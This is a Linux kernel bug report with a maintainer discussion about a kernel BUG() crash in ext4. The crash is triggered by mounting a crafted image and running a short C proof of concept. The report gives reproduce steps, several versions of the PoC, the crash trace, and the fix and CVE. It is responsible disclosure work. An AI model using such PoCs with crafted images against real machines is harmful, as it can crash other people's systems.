Bug 200015

Summary: BUG() triggered in ext4_get_group_info() when mounting and operating a crafted ext4 image
Product: File System Reporter: Wen Xu (wen.xu)
Component: ext4Assignee: fs_ext4 (fs_ext4)
Status: RESOLVED CODE_FIX    
Severity: normal CC: tytso, wen.xu
Priority: P1    
Hardware: All   
OS: Linux   
Kernel Version: 4.17 Subsystem:
Regression: No Bisected commit-id:
Attachments: The (compressed) crafted image which causes crash
Simplified image

Description Wen Xu 2018-06-10 01:18:26 UTC
Created attachment 276439 [details]
The (compressed) crafted image which causes crash

- Overview
BUG() triggered in ext4_get_group_info() when mounting and operating a crafted ext4 image

- Reproduce (on ext4 dev branch)
# mkdir mnt 
# mount -t ext4 10.img mnt
# gcc -o poc poc.c
# ./poc ./mnt

- POC (poc.c)
#define _GNU_SOURCE
#include <sys/types.h>
#include <sys/mount.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/xattr.h>

#include <dirent.h>
#include <errno.h>
#include <error.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#include <linux/falloc.h>
#include <linux/loop.h>

static void activity(char *mpoint) {

  char *foo_bar_baz;
  int err;

  static int buf[8192];
  memset(buf, 0, sizeof(buf));

  err = asprintf(&foo_bar_baz, "%s/foo/bar/baz", mpoint);

  // open / write / read
  int fd = open(foo_bar_baz, O_RDWR | O_TRUNC, 0777);
  if (fd >= 0) {
    write(fd, (char *)buf, 517);
    write(fd, (char *)buf, sizeof(buf));
    fdatasync(fd);
    fsync(fd);
    close(fd);
  }

  // open / lseek / write / fallocate
  fd = open(foo_bar_baz, O_RDWR | O_TRUNC, 0777);
  if (fd >= 0) {
    lseek(fd, 1024 - 33, SEEK_SET);
    write(fd, (char *)buf, sizeof(buf));
    lseek(fd, 1024 * 1024 + 67, SEEK_SET);
    write(fd, (char *)buf, sizeof(buf));
    lseek(fd, 1024 * 1024 * 1024 - 113, SEEK_SET);
    write(fd, (char *)buf, sizeof(buf));

    lseek(fd, 0, SEEK_SET);
    write(fd, (char *)buf, sizeof(buf));

    close(fd);
  }

}

int main(int argc, char *argv[]) {
  activity(argv[1]);
  return 0;
}

- Kernel message
[  354.513508] EXT4-fs (loop0): mounted filesystem with ordered data mode. Opts: (null)
[  378.126969] attempt to access beyond end of device
[  378.126992] loop0: rw=2049, want=131072002, limit=16384
[  378.127013] EXT4-fs warning (device loop0): ext4_end_bio:323: I/O error 10 writing to inode 14 (offset 1024 size 0 starting block 65536000)
[  378.127027] Buffer I/O error on device loop0, logical block 65536000
[  378.128537] attempt to access beyond end of device
[  378.128542] loop0: rw=2049, want=8489140226, limit=16384
[  378.128548] EXT4-fs warning (device loop0): ext4_end_bio:323: I/O error 10 writing to inode 14 (offset 1024 size 0 starting block 4244570112)
[  378.128551] Buffer I/O error on device loop0, logical block 4244570112
[  378.130133] attempt to access beyond end of device
[  378.130139] loop0: rw=2049, want=7415529474, limit=16384
[  378.130145] EXT4-fs warning (device loop0): ext4_end_bio:323: I/O error 10 writing to inode 14 (offset 6144 size 0 starting block 3707764736)
[  378.130148] Buffer I/O error on device loop0, logical block 3707764736
[  378.131616] attempt to access beyond end of device
[  378.131620] loop0: rw=2049, want=33554432, limit=16384
[  378.131626] EXT4-fs warning (device loop0): ext4_end_bio:323: I/O error 10 writing to inode 14 (offset 6144 size 0 starting block 16777215)
[  378.131629] Buffer I/O error on device loop0, logical block 16777215
[  378.133268] attempt to access beyond end of device
[  378.133274] loop0: rw=2049, want=16898, limit=16384
[  378.133282] EXT4-fs warning (device loop0): ext4_end_bio:323: I/O error 10 writing to inode 14 (offset 6144 size 0 starting block 8448)
[  378.133286] Buffer I/O error on device loop0, logical block 8448
[  378.134795] attempt to access beyond end of device
[  378.134800] loop0: rw=2049, want=4194306, limit=16384
[  378.134806] EXT4-fs warning (device loop0): ext4_end_bio:323: I/O error 10 writing to inode 14 (offset 8192 size 0 starting block 2097152)
[  378.134810] Buffer I/O error on device loop0, logical block 2097152
[  378.136261] attempt to access beyond end of device
[  378.136266] loop0: rw=2049, want=16386, limit=16384
[  378.136277] EXT4-fs warning (device loop0): ext4_end_bio:323: I/O error 10 writing to inode 14 (offset 0 size 0 starting block 8192)
[  378.136281] Buffer I/O error on device loop0, logical block 8192
[  378.137671] EXT4-fs error (device loop0): ext4_map_blocks:718: inode #14: block 1617: comm a.out: lblock 17 mapped to illegal pblock (length 2)
[  378.160754] EXT4-fs (loop0): Delayed block allocation failed for inode 14 at logical offset 17 with max blocks 2 with error 117
[  378.163203] EXT4-fs (loop0): This should not happen!! Data will be lost

[  378.165136] attempt to access beyond end of device
[  378.165141] loop0: rw=2049, want=16386, limit=16384
[  378.165147] EXT4-fs warning (device loop0): ext4_end_bio:323: I/O error 10 writing to inode 14 (offset 0 size 0 starting block 8192)
[  378.165150] Buffer I/O error on device loop0, logical block 8192
[  378.166497] attempt to access beyond end of device
[  378.166501] loop0: rw=2049, want=16386, limit=16384
[  378.166507] EXT4-fs warning (device loop0): ext4_end_bio:323: I/O error 10 writing to inode 14 (offset 0 size 0 starting block 8192)
[  378.166510] Buffer I/O error on device loop0, logical block 8192
[  378.167842] attempt to access beyond end of device
[  378.167846] loop0: rw=2049, want=3056838182, limit=16384
[  378.167852] EXT4-fs warning (device loop0): ext4_end_bio:323: I/O error 10 writing to inode 14 (offset 0 size 0 starting block 1528419090)
[  378.167855] Buffer I/O error on device loop0, logical block 1528419090
[  378.169270] attempt to access beyond end of device
[  378.169274] loop0: rw=2049, want=3056838182, limit=16384
[  378.169314] attempt to access beyond end of device
[  378.169318] loop0: rw=2049, want=8589803526, limit=16384
[  378.169347] attempt to access beyond end of device
[  378.169351] loop0: rw=2049, want=253608, limit=16384
[  378.171034] EXT4-fs error (device loop0): ext4_read_block_bitmap_nowait:423: comm a.out: Invalid block bitmap block 34 in block_group 0
[  378.218824] EXT4-fs (loop0): Delayed block allocation failed for inode 14 at logical offset 29 with max blocks 1 with error 117
[  378.221300] EXT4-fs (loop0): This should not happen!! Data will be lost

[  378.223484] EXT4-fs error (device loop0): ext4_read_block_bitmap_nowait:423: comm a.out: Invalid block bitmap block 34 in block_group 0
[  378.250235] EXT4-fs (loop0): Delayed block allocation failed for inode 14 at logical offset 32 with max blocks 1 with error 117
[  378.252692] EXT4-fs (loop0): This should not happen!! Data will be lost

[  378.255339] ------------[ cut here ]------------
[  378.255347] kernel BUG at fs/ext4/ext4.h:2764!
[  378.256408] invalid opcode: 0000 [#1] SMP KASAN PTI
[  378.257447] Modules linked in: snd_hda_codec_generic snd_hda_intel snd_hda_codec snd_hwdep snd_hda_core snd_pcm snd_timer snd i2c_piix4 mac_hid soundcore ib_iser rdma_cm iw_cm ib_cm ib_core iscsi_tcp libiscsi_tcp libiscsi scsi_transport_iscsi autofs4 btrfs zstd_decompress zstd_compress xxhash raid10 raid456 async_raid6_recov async_memcpy async_pq async_xor async_tx xor raid6_pq raid1 raid0 multipath linear 8139too qxl drm_kms_helper syscopyarea sysfillrect crct10dif_pclmul sysimgblt fb_sys_fops ttm crc32_pclmul drm aesni_intel aes_x86_64 crypto_simd cryptd glue_helper pata_acpi 8139cp floppy mii
[  378.269019] CPU: 1 PID: 1377 Comm: a.out Not tainted 4.17.0-rc4+ #5
[  378.270379] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014
[  378.272440] RIP: 0010:ext4_mb_load_buddy_gfp+0x6a1/0x700
[  378.273551] RSP: 0018:ffff8801f0a4f628 EFLAGS: 00010282
[  378.274645] RAX: 0000000000000000 RBX: ffff8801f0a4f748 RCX: ffffffff864ff24b
[  378.276117] RDX: 0000000000000003 RSI: dffffc0000000000 RDI: ffff8801e10ac440
[  378.277604] RBP: ffff8801f0a4f698 R08: ffffed003d896a5b R09: ffffed003d896a5b
[  378.279092] R10: 0000000000000001 R11: ffffed003d896a5a R12: ffff8801e10abf88
[  378.280580] R13: ffff8801e10abb80 R14: 00000000ffffffff R15: ffff8801e10ac400
[  378.282080] FS:  00007fa96cecd700(0000) GS:ffff8801f7100000(0000) knlGS:0000000000000000
[  378.283766] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  378.284976] CR2: 00007fedd19df070 CR3: 00000001f0dd2000 CR4: 00000000000006e0
[  378.286462] Call Trace:
[  378.287013]  ? start_this_handle+0x326/0x810
[  378.287949]  ? invalidate_inode_pages2+0x20/0x20
[  378.288936]  ext4_discard_preallocations+0x448/0x770
[  378.290002]  ? kasan_kmalloc+0xad/0xe0
[  378.290802]  ? ext4_exit_mballoc+0x70/0x70
[  378.291680]  ? ext4_empty_dir+0x420/0x420
[  378.292919]  ? __ext4_journal_start_sb+0x89/0x180
[  378.293914]  ext4_truncate+0x5d2/0x780
[  378.294705]  ? ext4_punch_hole+0x670/0x670
[  378.295562]  ? ext4_empty_dir+0x420/0x420
[  378.296419]  ext4_setattr+0x55c/0xe30
[  378.297206]  notify_change+0x4e1/0x680
[  378.298021]  ? apparmor_file_receive+0x80/0x80
[  378.298946]  ? kasan_check_write+0x14/0x20
[  378.299824]  do_truncate+0xe8/0x160
[  378.300570]  ? do_truncate+0xe8/0x160
[  378.301346]  ? file_open_root+0x1c0/0x1c0
[  378.302182]  ? common_perm+0x290/0x290
[  378.302978]  path_openat+0x1663/0x1e80
[  378.303792]  ? __save_stack_trace+0x92/0x100
[  378.304711]  ? vfs_unlink+0x250/0x250
[  378.305483]  ? save_stack+0x46/0xd0
[  378.306217]  ? kasan_slab_alloc+0x11/0x20
[  378.307053]  ? kmem_cache_alloc+0xd1/0x1e0
[  378.307907]  ? getname_flags+0x76/0x2c0
[  378.308727]  ? getname+0x12/0x20
[  378.309409]  ? do_sys_open+0x14b/0x2c0
[  378.310193]  ? __x64_sys_open+0x4c/0x60
[  378.311016]  ? do_syscall_64+0x78/0x170
[  378.311861]  ? entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  378.312970]  ? find_get_entries_tag+0x3d0/0x3d0
[  378.313928]  ? wbc_detach_inode+0x36/0x2d0
[  378.314790]  ? do_writepages+0x37/0xb0
[  378.315577]  do_filp_open+0x12b/0x1d0
[  378.316360]  ? delete_from_page_cache_batch+0x4e0/0x4e0
[  378.317453]  ? may_open_dev+0x50/0x50
[  378.318221]  ? kasan_kmalloc+0xad/0xe0
[  378.319006]  do_sys_open+0x17c/0x2c0
[  378.319758]  ? do_sys_open+0x17c/0x2c0
[  378.320556]  ? filp_open+0x60/0x60
[  378.321292]  ? task_work_run+0x4d/0xf0
[  378.322080]  __x64_sys_open+0x4c/0x60
[  378.322853]  do_syscall_64+0x78/0x170
[  378.323625]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  378.324696] RIP: 0033:0x7fa96c9df040
[  378.325446] RSP: 002b:00007fffad191588 EFLAGS: 00000246 ORIG_RAX: 0000000000000002
[  378.326996] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007fa96c9df040
[  378.328472] RDX: 00000000000001ff RSI: 0000000000000202 RDI: 00000000010e8080
[  378.329953] RBP: 00007fffad1915e0 R08: 00000000010e8010 R09: 0000000000000000
[  378.331415] R10: 0000000000000690 R11: 0000000000000246 R12: 00000000004006a0
[  378.332900] R13: 00007fffad1916e0 R14: 0000000000000000 R15: 0000000000000000
[  378.334381] Code: d6 e7 ff ff 85 c0 41 89 c7 75 6e 4c 89 e7 e8 a7 54 dd ff e9 74 fc ff ff 48 8d 43 18 48 89 45 a0 41 bf f4 ff ff ff e9 21 fe ff ff <0f> 0b 8b 55 ac 44 89 f6 4c 89 ef e8 6f f3 ff ff 85 c0 0f 84 c2
[  378.338307] RIP: ext4_mb_load_buddy_gfp+0x6a1/0x700 RSP: ffff8801f0a4f628
[  378.339805] ---[ end trace 9f703e0d0e15b354 ]---
[  378.340857] ===============================================================
 
- Location
https://elixir.bootlin.com/linux/v4.17/source/fs/ext4/ext4.h#L2761
 BUG_ON(group >= EXT4_SB(sb)->s_groups_count);

Reported by Wen Xu (wen.xu@gatech.edu) from SSLab at Gatech.
Comment 1 Wen Xu 2018-06-14 23:08:25 UTC
More simple POC:

#define _GNU_SOURCE
#include <sys/types.h>
#include <sys/mount.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/xattr.h>

#include <dirent.h>
#include <errno.h>
#include <error.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#include <linux/falloc.h>
#include <linux/loop.h>

static void activity(char *mpoint) {

  char *foo_bar_baz;
  int err;

  static int buf[8192];
  memset(buf, 0, sizeof(buf));

  err = asprintf(&foo_bar_baz, "%s/foo/bar/baz", mpoint);

  int fd = open(foo_bar_baz, O_RDWR | O_TRUNC, 0777);
  if (fd >= 0) {
    write(fd, (char *)buf, 517);
    write(fd, (char *)buf, sizeof(buf));
    close(fd);
  }

  fd = open(foo_bar_baz, O_RDWR | O_TRUNC, 0777);
  if (fd >= 0) {
   write(fd, (char *)buf, sizeof(buf));
    close(fd);
  }
}

int main(int argc, char *argv[]) {
  activity(argv[1]);
  return 0;
}
Comment 2 Theodore Tso 2018-06-14 23:30:08 UTC
Thanks for the simplified POC.  But unfortunately that doesn't really tell me anything new.  What I need is a simplified POC *image*.

I can add a simplistic check to see if we get a negative group number in ext4_discard_preallocations(), but that's not the real root cause.  And it wouldn't be a complete solution, since we would have add gazillions of checks anywhere we use s_first_data_block.    It's much better if we can check s_first_data_block at mount time (which we do), and then make sure that it can't get corrupted afterwards.

So the real root cause is somehow, the superblock buffer has gotten corrupted.   We have a lot of checks to prevent this from happening --- that's what the ext4_data_block_valid() function in fs/ext4/block_validity.c is all about --- but obviously, we're missing a check somewhere.   The question is where.   If we had a simplified POC image, I could look to find the file system corruption that was causing the superblock to get trashed.   The problem is that there are so many random corruptions, many of them completely irrelevant to the bug at hand, that this is extremely difficult.
Comment 3 Wen Xu 2018-06-14 23:35:50 UTC
(In reply to Theodore Tso from comment #2)
> Thanks for the simplified POC.  But unfortunately that doesn't really tell
> me anything new.  What I need is a simplified POC *image*.
> 
> I can add a simplistic check to see if we get a negative group number in
> ext4_discard_preallocations(), but that's not the real root cause.  And it
> wouldn't be a complete solution, since we would have add gazillions of
> checks anywhere we use s_first_data_block.    It's much better if we can
> check s_first_data_block at mount time (which we do), and then make sure
> that it can't get corrupted afterwards.
> 
> So the real root cause is somehow, the superblock buffer has gotten
> corrupted.   We have a lot of checks to prevent this from happening ---
> that's what the ext4_data_block_valid() function in fs/ext4/block_validity.c
> is all about --- but obviously, we're missing a check somewhere.   The
> question is where.   If we had a simplified POC image, I could look to find
> the file system corruption that was causing the superblock to get trashed.  
> The problem is that there are so many random corruptions, many of them
> completely irrelevant to the bug at hand, that this is extremely difficult.

Yeah, I know. I will spend some time to make a simplified POC image for you :)
Comment 4 Wen Xu 2018-06-15 00:15:51 UTC
Created attachment 276563 [details]
Simplified image

Hi Ted,

You can still use this POC:

#define _GNU_SOURCE
#include <sys/types.h>
#include <sys/mount.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/xattr.h>

#include <dirent.h>
#include <errno.h>
#include <error.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#include <linux/falloc.h>
#include <linux/loop.h>

static void activity(char *mpoint) {

  char *foo_bar_baz;
  int err;

  static int buf[8192];
  memset(buf, 0, sizeof(buf));

  err = asprintf(&foo_bar_baz, "%s/foo/bar/baz", mpoint);

  int fd = open(foo_bar_baz, O_RDWR | O_TRUNC, 0777);
  if (fd >= 0) {
    write(fd, (char *)buf, 517);
    write(fd, (char *)buf, sizeof(buf));
    close(fd);
  }

  fd = open(foo_bar_baz, O_RDWR | O_TRUNC, 0777);
  if (fd >= 0) {
   write(fd, (char *)buf, sizeof(buf));
    close(fd);
  }
}

int main(int argc, char *argv[]) {
  activity(argv[1]);
  return 0;
}

When I am testing, sometimes umount is required.

Thanks,
Wen
Comment 5 Theodore Tso 2018-06-15 04:35:42 UTC
Thanks Wen for your help in tracking down the problem.

The fix is here: http://patchwork.ozlabs.org/patch/929792/
Comment 6 Theodore Tso 2018-07-02 16:07:39 UTC
This has been assigned CVE-2018-10881

Red Hat Bugzilla: https://bugzilla.redhat.com/show_bug.cgi?id=1596828